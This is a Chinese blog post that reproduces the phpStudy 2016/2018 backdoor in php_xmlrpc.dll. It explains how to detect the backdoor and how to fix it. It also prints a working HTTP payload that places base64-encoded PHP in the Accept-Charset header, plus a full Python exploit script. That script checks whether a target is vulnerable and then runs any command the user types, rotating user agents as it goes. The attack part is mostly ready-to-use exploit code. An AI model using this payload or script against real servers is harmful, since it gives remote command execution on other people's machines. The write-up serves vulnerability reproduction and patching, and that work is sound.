PhpStuday后门复现+poc

PhpStuday后门复现

编写者：thelostworld_fv(秋刀鱼)

漏洞详情：

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装，无需配置即可直接安装使用，具有PHP环境调试和PHP开发功能，在国内有着近百万PHP语言学习者、开发者用户，9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章，文章里说明phpstudy存在“后门”。

影响版本：

php-5.2.17、php-5.4.45

检测方法：

通过分析，后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

使用记事本打开对应的文件，查找@eval 关键字

本次使用phpstudy2016版本（确实2018版本和2016版本不好找：》）

php-5.2.17版本

php-5.4.45版本

漏洞复现：

启动漏洞版本对应的版本

成功启动环境

拦截数据包，添加如下的请求头字段：

Accept-Encoding中逗号后面的空格要去掉

Accept-Encoding: gzip,deflate

Accept-Charset为echo system('whoami')的base64编码

Accept-Charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==

完整数据包利用的payload

GET / HTTP/1.1 Host: 10.211.55.3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip,deflate

Accept-Charset: 您添加的base64加密的执行语句

Accept-Language: zh-CN,zh;q=0.9 Connection: close

执行whoami相关回显

尝试ipconfig

python验证脚本截图：

验证脚本（下面这个是比较完整和使用方便） 尝试很多做后决定用这个

import requests

import base64

from random import choice

USER_AGENTS = [

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",

"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",

"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",

"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",

"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",

"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",

"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",

"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",

"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",

"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",

"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",

"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",

"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",

"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",

"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",

"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",

"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",

"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",

"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",

"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"

]

TIME_OUT=10

print(r"""

Usage & e.g. :

Target Url:

localhost/flag.php

Input Your Command:

phpinfo();

Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');

By:Sp4ce

Have Fun

""")

def checkTarget(url):

poc = {

"Accept-Charset": "cGhwaW5mbygpOw==",

"Accept-Encoding": "gzip,deflate"

}

try:

pocRequest = requests.get(url, headers=poc,timeout=TIME_OUT)

if "phpinfo" in str(pocRequest.content):

print('[+] Target is vulnerable.')

return True

else:

print('[-] Target is NOT vulnerable.')

return False

except :

print('[-] Looks Like Something Wrong.')

def exploit(url,command):

headers = {}

headers['User-Agent'] = choice(USER_AGENTS)

headers['Accept-Encoding'] = 'gzip,deflate'

headers['Accept-Charset'] = command

try:

request = requests.get(url, headers=headers)

if request.status_code == 200:

print('[+] Command Execute Successful.')

print(request.text)

else:

print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')

except:

print('[-] Looks Like Something Wrong.\n')

if __name__ == "__main__":

while True:

url = input("Target Url:\n")

if 'http' not in url:

url = "http://" + url

print('[i] Checking Target...')

if checkTarget(url):

cmd = input("Input Your Command:\n")

command = base64.b64encode(cmd.encode('utf-8'))

exploit(url,command)

修复方式：

从PHP官网下载原始php-5.4.45版本或php-5.2.17版本，替换其中的php_xmlrpc.dll，下载地址：

https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip

https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

总结：

1、环境搭建， 下载好2018或者2016的安装文件，安装后检查一下对应的是否存在，浪费很多时间，环境不好找。

2、payload注意base时候加不加分好例子：system('whoami'); 。

3、周末无聊找了一个漏洞复现一下（安全贵在坚持），如果有纰漏，望大佬指正。

参考：

https://www.cnblogs.com/liliyuanshangcao/p/11584397.html

https://www.cnblogs.com/yuanshu/p/11613796.html

https://blog.csdn.net/weixin_43886632/article/details/101294081

个人简书：https://www.jianshu.com/u/bf0e38a8d400

个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns